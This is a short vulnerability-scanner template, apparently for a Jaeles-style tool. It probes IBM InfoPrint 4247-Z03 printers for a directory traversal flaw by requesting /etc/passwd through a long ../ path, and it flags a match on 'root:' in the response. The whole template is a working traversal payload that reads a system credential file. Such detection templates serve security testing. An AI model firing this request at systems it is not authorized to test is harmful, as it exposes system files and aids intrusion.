id: ibm-printinfo-lfi
info:
  name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal
  risk: High

params:
  - root: '{{.BaseURL}}'

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/./../../../../../../../../../../etc/passwd
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", "/bin/bash")

references:
  - link: https://www.exploit-db.com/exploits/47835